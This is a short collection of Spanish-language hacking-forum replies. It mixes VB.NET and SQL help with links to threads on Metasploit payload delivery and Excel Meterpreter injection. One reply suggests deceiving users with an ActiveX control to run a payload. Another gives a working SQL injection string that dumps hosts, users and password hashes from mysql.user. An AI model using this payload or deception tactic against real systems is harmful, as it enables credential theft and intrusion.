Mensajes

http://foro.elhacker.net/hacking_avanzado/metasploit_java_applet_infection-t281594.0.html
http://foro.elhacker.net/hacking_avanzado/metasploit_java_applet_infection_metodo_2-t283670.0.html
http://foro.elhacker.net/hacking_basico/xlsinjector_%E2%80%93_inyectar_shell_meterpreter_en_archivos_excel-t278822.0.html

Código (vbnet) [Seleccionar] Expandir

Dim cmd As New SqlCommand

Public Function InsertarDatos(ByVal ClaveAlumno As String, ByVal Nombre As String) As String
   cmd = New SqlCommand("Nombre_Procedimiento", cnn)
   cmd.CommandType = CommandType.StoredProcedure
   cmd.Parameters.Add("@ClaveAlumno", SqlDbType.Varchar)
   cmd.Parameters.Add("@Nombre", SqlDbType.Varchar)
   Try
      cmd.ExecuteNonQuery()
      Return "Ejecutado Correctamente!"
   Catch
      Return "Error!"
   End Try
End Function

[ActiveX Control]

Pues si lo que te interesa es solo ejecutar el Payload a modo de prueba, pues puedes hacerlo desde el mismo windows! De lo contrario, existen formas de engañar al usuario, por ejemplo un ActiveX Control!

[Store Procedure]

Es posible, pero es mejor usar Store Procedure!

Consulta sobre funciones como... MAX(), COUNT(), INNER JOIN, DESC, ASC.

xD. Pero sin maquinas virtuales o fisicas, es decir, son 2 particiones y en cada una de ellas tenes los O.S's o dentro de una maquina virtual instalaste los 2 S.O's. Puedes tener los 2 S.O's activos al mismo tiempo? de lo contrario no podras usarlos como hacklab xD

[>= 5]

mmm ya sé cual es él problema... Mira lo que pasa esque la version de MySQL debe ser >= 5 para que tenga information_schema de lo contrario no podras usarlo.

Que error?

Intentad así:

Código (sql) [Seleccionar] Expandir

id=-1+union+all+select+1,group_concat(host,0x3a,user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+mysql.user--

Haz mirado tutorial de iSQL?

What The Fuck!